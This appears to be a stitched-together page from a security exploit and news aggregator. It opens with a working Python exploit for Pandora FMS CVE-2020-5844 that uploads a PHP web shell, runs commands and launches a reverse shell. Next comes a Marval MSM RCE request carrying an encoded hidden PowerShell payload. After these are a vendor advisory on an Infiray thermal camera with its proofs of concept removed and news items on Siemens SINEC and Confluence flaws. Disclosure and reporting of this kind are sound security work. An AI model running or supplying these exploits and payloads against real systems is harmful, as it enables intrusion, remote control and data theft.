exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]  python3 exploit-CVE-2020-5844.py -hOptions:  -t    Target host and port. Provide target IP address and port.  -u    Target username and password. Provide username and password to log in to Pandora FMS.  -p    Target valid PHP session ID. No username or password needed. (Optional)  -s    Reverse shell mode. Provide local IP address and port. (Optional)  -c    Custom command mode. Provide command to execute. (Optional)  -w    Web shell custom mode. Provide custom PHP file name. (Optional)  -h    Show this help menu.""")    exit()# Pretty loading wheeldef loading(spins):    def spinning_cursor():        while True:            for cursor in '|/-\\':                yield cursor    spinner = spinning_cursor()    for _ in range(spins):        sys.stdout.write(next(spinner))        sys.stdout.flush()        time.sleep(0.1)        sys.stdout.write('\b')# Run the exploitdef exploit(exploitMode, targetSess):    UNICORD_ASCII()    # Print initial variables    print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution{color.no}")    print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}")    if targetSess is not None:        print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")    elif targetUser is not None:        print(f"{color.blue}USERNAME: {color.gold}{targetUser}{color.no}")        print(f"{color.blue}PASSWORD: {color.gold}{targetPass}{color.no}")    if exploitMode == "command":        print(f"{color.blue}COMMAND: {color.gold}{command}{color.no}")    if exploitMode == "web":        print(f"{color.blue}WEBFILE: {color.gold}{webName}{color.no}")    if exploitMode == "shell":        print(f"{color.blue}LOCALIP: {color.gold}{localIP}:{localPort}{color.no}")        print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}")    print(f"{color.blue}WEBSITE: {color.gold}http://{targetIP}:{targetPort}/pandora_console{color.no}")    loading(15)    # If a PHPSESSID is not provided, grab one with valid username and password    if targetSess is None:        try:            getSession = requests.post(f"http://{targetIP}:{targetPort}/pandora_console/index.php?login=1", data={"nick": targetUser, "pass": targetPass, "login_button": "login"})            targetSess = getSession.cookies.get('PHPSESSID')            print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")            if "login_move" in getSession.text:                print(f"{color.blue}ERRORED: {color.red}Invalid credentials!{color.no}")        except:            print(f"{color.blue}ERRORED: {color.red}Could not log in to website!{color.no}")            exit()    # Set headers, parameters, and cookies for post request    headers = {    'Host': f'{targetIP}',    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',    'Accept-Language': 'en-US,en;q=0.5',    'Accept-Encoding': 'gzip, deflate',    'Content-Type': 'multipart/form-data; boundary=---------------------------308045185511758964171231871874',    'Content-Length': '1289',    'Connection': 'close',    'Referer': f'http://{targetIP}:{targetPort}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager',    'Upgrade-Insecure-Requests': '1',    'Sec-Fetch-Dest': 'document',    'Sec-Fetch-Mode': 'navigate',    'Sec-Fetch-Site': 'same-origin',    'Sec-Fetch-User': '?1'    }    params = (        ('sec', 'gsetup'),        ('sec2', 'godmode/setup/file_manager')    )    cookies = {'PHPSESSID': targetSess}    # Basic PHP web shell with 'cmd' parameter    data = f'-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="file"; filename="{webName}"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET[\'cmd\']);?>\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="umask"\r\n\r\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="decompress_sent"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="go"\r\n\r\nGo\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="real_directory"\r\n\r\n/var/www/pandora/pandora_console/images\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="directory"\r\n\r\nimages\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash"\r\n\r\n6427eed956c3b836eb0644629a183a9b\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash2"\r\n\r\n594175347dddf7a54cc03f6c6d0f04b4\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="upload_file_or_zip"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874--\r\n'    # Try to upload the PHP web shell to the server    try:        response = requests.post(f'http://{targetIP}:{targetPort}/pandora_console/index.php', headers=headers, params=params, cookies=cookies, data=data, verify=False)    except:        print(f"{color.blue}ERRORED: {color.red}Could not connect to website!{color.no}")        exit()    statusCode=response.status_code    if statusCode == 200:        print(f"{color.blue}EXPLOIT: {color.gold}Connected to website! Status Code: {statusCode}{color.no}")    else:        print(f"{color.blue}ERRORED: {color.red}Could not connect to website! Status Code: {statusCode}{color.no}")        exit()    loading(15)    print(f"{color.blue}EXPLOIT: {color.gold}Logged into Pandora FMS!{color.no}")    loading(15)    # Print web shell location if in web shell mode    if exploitMode == "web":        print(f"{color.blue}EXPLOIT: {color.gold}Web shell uploaded!{color.no}")        print(f"{color.blue}SUCCESS: {color.green}Web shell available at: http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd=whoami {color.no}\n")    # Run custom command on web shell if in command mode    if exploitMode == "command":        response = requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(command)}')        print(f"{color.blue}SUCCESS: {color.green}Command executed! Printing response below:{color.no}\n")        print(response.text)    # Run reverse shell command if in reverse shell mode    if exploitMode == "shell":        shell = f"php -r \'$sock=fsockopen(\"{localIP}\",{localPort});exec(\"/bin/sh -i <&3 >&3 2>&3\");\'"        try:            requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(shell)}',timeout=1)            print(f"{color.blue}ERRORED: {color.red}Reverse shell could not connect! Make sure you have a local listener on {color.gold}{localIP}:{localPort}{color.no}\n")        except:            print(f"{color.blue}SUCCESS: {color.green}Reverse shell executed! Check your local listener on {color.gold}{localIP}:{localPort}{color.no}\n")    exit()if __name__ == "__main__":    args = ['-h','-t','-u','-p','-s','-c','-w']    modes = {'web':'Web Shell Mode','command':'Command Shell Mode','shell':'Reverse Shell Mode'}    # Initialize starting variables    targetIP = None    targetPort = None    targetUser = None    targetPass = None    targetSess = None    command = None    localIP = None    localPort = None    webName = "unicord.php" # Default web shell file name    exploitMode = "web" # Default to web shell mode    # Print help if specified or if a target or authentication is not provided    if args[0] in sys.argv or args[1] not in sys.argv or (args[2] not in sys.argv and args[3] not in sys.argv):        help()    # Collect target IP and port from CLI    if args[1] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[1]) + 1]:                raise            targetIP = sys.argv[sys.argv.index(args[1]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[1]) + 2]:                raise            targetPort = sys.argv[sys.argv.index(args[1]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")            exit()    # Collect target username and password from  CLI    if args[2] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[2]) + 1]:                raise            targetUser = sys.argv[sys.argv.index(args[2]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[2]) + 2]:                raise            targetPass = sys.argv[sys.argv.index(args[2]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")            exit()    # Collect PHPSESSID from CLI, if specified    if args[3] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[3]) + 1]:                raise            targetSess = sys.argv[sys.argv.index(args[3]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a valid PHPSESSID! \"-p <PHPSESSID>\"{color.no}")            exit()    # Set reverse shell mode from CLI, if specified    if args[4] in sys.argv:        exploitMode = "shell"        try:            if "-" in sys.argv[sys.argv.index(args[4]) + 1]:                raise            localIP = sys.argv[sys.argv.index(args[4]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[4]) + 2]:                raise            localPort = sys.argv[sys.argv.index(args[4]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Set custom command mode from CLI, if specified    elif args[5] in sys.argv:        exploitMode = "command"        try:            if sys.argv[sys.argv.index(args[5]) + 1] in args:                raise            command = sys.argv[sys.argv.index(args[5]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a custom command! \"-c <command>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Set web shell mode from CLI, if specified    elif args[6] in sys.argv:        exploitMode = "web"        try:            if sys.argv[sys.argv.index(args[6]) + 1] in args:                raise            if ".php" not in sys.argv[sys.argv.index(args[6]) + 1]:                webName = sys.argv[sys.argv.index(args[6]) + 1] + ".php"            else:                webName = sys.argv[sys.argv.index(args[6]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a custom PHP file name! \"-c <name.php>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Run with default web shell mode if no mode is specified    else:        exploit(exploitMode,targetSess)

Pandora FMS 7.0NG.742 Remote Code Execution

Marval MSM version 14.19.0.12476 suffers from a remote code execution vulnerability.

    # Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)# Date: 27/5/2022# Exploit Author: Momen Eldawakhly (Cyber Guy)# Vendor Homepage: https://www.marvalnorthamerica.com/# Software Link: https://www.marvalnorthamerica.com/# Version: v14.19.0.12476# Tested on: Windows# Detailed blog: https://cyber-guy.gitbook.io/cyber-guy/blogs/marval-msm-rcePOST /MSM_Test/RFP/Forms/ScriptHandler.ashx?method=ProcessScript&classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP/2Host: MSMHandler.ioCookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: application/json, text/javascript, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestContent-Length: 456Origin: https://MSMHandler.ioDnt: 1Referer: https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptMaintenance.aspx?id=3Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstype=%221%22&content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&id=%2226%22&isCi=true

Marval MSM 14.19.0.12476 Remote Code Execution

Infiray IRAY-A8Z3 thermal camera version 1.0.957 suffers from hardcoded web credential, authenticated remote code execution, buffer overflow, lack of password for root, and outdated software component vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20220607-0 >  
=======================================================================  
               title: Multiple Vulnerabilities  
             product: Infiray IRAY-A8Z3 thermal camera  
  vulnerable version: V1.0.957  
       fixed version: None  
          CVE number: CVE-2022-31208, CVE-2022-31209, CVE-2022-31210,  
                      CVE-2022-31211  
              impact: Critical  
            homepage: http://www.infiray.com/  
               found: 2021-02  
                  by: S. Robertz (Office Vienna)  
                      F. Lienhart  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"IRay Technology Co., Ltd. is a wholly-owned subsidiary of Raytron Technology  
Co., Ltd. (SSE: 688002). As a high-tech enterprise, IRay Technology develops  
and manufactures infrared FPA detectors, thermal imaging modules, and other  
products, with completely independent intellectual property rights. We are  
committed to providing global customers with professional thermal imaging  
products and solutions. The main products include IRFPA detectors, thermal  
imaging cores, and terminal products for application."

Source: http://www.infiray.com/about.html

Business recommendation:  
------------------------  
The vendor was unresponsive during the disclosure process. Hence it is unclear  
whether patches are available. Customers are urged to approach their vendor  
contact and request security reviews and updates.

SEC Consult recommends to perform a thorough security review of these  
products conducted by security professionals to identify and resolve all  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Hardcoded Web Credentials (CVE-2022-31210)  
The binary file "/usr/local/sbin/webproject/set_param.cgi" contains hardcoded  
credentials to the web application. As these accounts cannot be deactivated  
or change their passwords, they are considered to be backdoor accounts.

2) Authenticated Remote Code Execution (CVE-2022-31208)  
The webserver contains an endpoint that can execute arbitrary commands by  
manipulating the "cmd_string" URL parameter. The user can login using one  
of the backdoor accounts from issue 1.

3) Potential Buffer Overflow (CVE-2022-31209)  
The firmware contains a potential buffer overflow by calling strcpy() without  
checking the string length beforehand.

4) Telnet Root Shell without Password (CVE-2022-31211)  
The camera offers a shell through a telnet connection. The root user does not  
require a password per default. Thus, anyone on the local network can  
execute arbitrary commands as root on the camera.

5) Multiple Outdated Software Components  
Multiple outdated software components containing vulnerabilities were found by  
the IoT Inspector (ONEKEY) firmware analysis platform.

Proof of concept:  
-----------------  
1) Hardcoded Web Credentials (CVE-2022-31210)  
The following cgi program will be executed during the login process:

http://<my_ip>:8080/set_param.cgi?&group_tag=hash_param_bridge  
&set_cmd=loading&length=35&name=<user>&password=<password>&access=0  
&0.3543773172371312

The following de-compilation shows the code flow with the hardcoded passwords:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
The authentication works by comparing the URL supplied username with the string  
"[removed]". Afterwards it will compare the password parameter to "[removed]" as well. If both  
string parameters match, a message will be removed from the messaging queue.  
Otherwise the function will just return. The same comparison holds for the admin account.

Furthermore, string comparisons are made without checking the case. Hence,  
drastically improving the chances of brute-force attacks.

2) Authenticated Remote Code Execution (CVE-2022-31208)  
The web application offers an option to view the device log. Opening following URL while  
logged in as admin (e.g. with hardcoded password from section 1) will trigger the request:

http://<my_ip>:8080/cmd.cgi?cmd_tag=cmd_passthrough&cmd_string=[removed]

By changing the "cmd_string" parameter, arbitrary commands can be executed with  
the rights of the webserver (www-data). The de-compiled code can be seen in following  
snippet:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
The "cmd_string" parameter is directly passed into popen() and hence executed.

3) Potential Buffer-Overflow (CVE-2022-31209)  
The firmware contains a potential buffer overflow vulnerability:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
A pointer to the "next_url" parameter is supplied. A buffer of 64 bytes is  
allocated and the parameter value copied to it without checking the string  
length. Hence, a "next_url" parameter with more than 64 bytes could be  
supplied in order to overflow the buffer.  
Please note that this vulnerability is only based on firmware analysis and thus  
was not tested in a live scenario.

4) Telnet Root Shell without Password (CVE-2022-31211)  
The camera has a telnetd server running on port 23 per default. The root  
password is empty. If the telnet port is exposed to the internet, an attacker  
could easily connect to the device and gain root access. The telnet server  
cannot be deactivated and the root password cannot be changed through the  
web interface.

5) Multiple Outdated Software Components  
IoT Inspector (ONEKEY) recognized multiple outdated software components  
with known vulnerabilities:

BusyBox 1.25.0:                                  6 CVEs  
curl 7.54.0:                                    13 CVEs  
Dnsmasq 2.76:                                    9 CVEs  
lighttpd 1.4.41:                                 2 CVEs  
Linux Kernel 3.10.104:                        1004 CVEs  
hostapd 2.5:                                    22 CVEs  
wpa_supplicant 2.5-devel_rtw_r17190.20160415:   12 CVEs

Vulnerable / tested versions:  
-----------------------------  
The following product/firmware version has been tested:  
* Infiray IRAY-A8Z3 V1.0.957

It has to be assumed that further products or firmware versions are affected as well.

Vendor contact timeline:  
------------------------  
2021-02-24: Contacting vendor through email address found on their website  
             (sales@infiray.com)  
2021-03-11: Contacted vendor again through sales@infiray.com  
2021-04-12: Contacting vendor through sales@infiray.com and InfiRay.CS@iraytek.com  
2021-04-12: Response from Sales Director, does not understand what to do with the information  
2021-04-12: Requesting a contact to the product owner or developer  
2021-04-13: Sending unencrypted security advisory to two provided email addresses.  
2021-04-29: Requesting status from vendor, no reply.  
2022-04-05: Requested status from vendor, no reply.  
2022-06-07: Release of security advisory.

Solution:  
---------  
The vendor was unresponsive during the disclosure process. Hence it is unclear  
whether patches are available. Customers are urged to approach their vendor  
contact and request security reviews and updates.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Robertz, F. Lienhart / @2022

Infiray IRAY-A8Z3 1.0.957 Code Execution / Overflow / Hardcoded Credentials

Cybersecurity researchers have disclosed details about 15 security flaws in Siemens SINEC network management system (NMS), some of which could be chained by an attacker to achieve remote code execution on affected systems.
"The vulnerabilities, if exploited, pose a number of risks to Siemens devices on the network including denial-of-service attacks, credential leaks, and remote code execution

Cybersecurity researchers have disclosed details about 15 security flaws in Siemens SINEC network management system (NMS), some of which could be chained by an attacker to achieve remote code execution on affected systems.

"The vulnerabilities, if exploited, pose a number of risks to Siemens devices on the network including denial-of-service attacks, credential leaks, and remote code execution in certain circumstances," industrial security company Claroty said in a new report.

The shortcomings in question — tracked from CVE-2021-33722 through CVE-2021-33736 — were addressed by Siemens in version V1.0 SP2 Update 1 as part of updates shipped on October 12, 2021.

"The most severe could allow an authenticated remote attacker to execute arbitrary code on the system, with system privileges, under certain conditions," Siemens noted in an advisory at the time.

Chief among the weaknesses is CVE-2021-33723 (CVSS score: 8.8), which allows for privilege escalation to an administrator account and could be combined with CVE-2021-33722 (CVSS score: 7.2), a path traversal flaw, to execute arbitrary code remotely.

Another notable flaw relates to a case of SQL injection (CVE-2021-33729, CVSS score: 8.8) that could be exploited by an authenticated attacker to execute arbitrary commands in the local database.

"SINEC is in a powerful central position within the network topology because it requires access to the credentials, cryptographic keys, and other secrets granting it administrator access in order to manage devices in the network," Claroty's Noam Moshe said.

"From an attacker's perspective carrying out a living-off-the-land type of attack where legitimate credentials and network tools are abused to carry out malicious activity, access to, and control of, SINEC puts an attacker in prime position for: reconnaissance, lateral movement, and privilege escalation."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Over a Dozen Flaws Found in Siemens' Industrial Network Management System

A recently patched critical security flaw in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.
In at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a crypto miner called z0miner

A recently patched critical security flaw in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.

In at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a crypto miner called z0miner on victim networks.

The bug (CVE-2022-26134, CVSS score: 9.8), which was patched by Atlassian on June 3, 2022, enables an unauthenticated actor to inject malicious code that paves the way of remote code execution (RCE) on affected installations of the collaboration suite. All supported versions of Confluence Server and Data Center are affected.

Other notable malware pushed as part of disparate instances of attack activity include Mirai and Kinsing bot variants, a rogue package called pwnkit, and Cobalt Strike by way of a web shell deployed after gaining an initial foothold into the compromised system.

"The vulnerability, CVE-2022-26134, allows an attacker to spawn a remotely-accessible shell, in-memory, without writing anything to the server's local storage," Andrew Brandt, principal security researcher at Sophos, said.

The disclosure overlaps with similar warnings from Microsoft, which revealed last week that "multiple adversaries and nation-state actors, including DEV-0401 and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134."

DEV-0401, described by Microsoft as a "China-based lone wolf turned LockBit 2.0 affiliate," has also been previously linked to ransomware deployments targeting internet-facing systems running VMWare Horizon (Log4Shell), Confluence (CVE-2021-26084), and on-premises Exchange servers (ProxyShell).

The development is emblematic of an ongoing trend where threat actors are increasingly capitalizing on newly disclosed critical vulnerabilities rather than exploiting publicly known, dated software flaws across a broad spectrum of targets.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#rce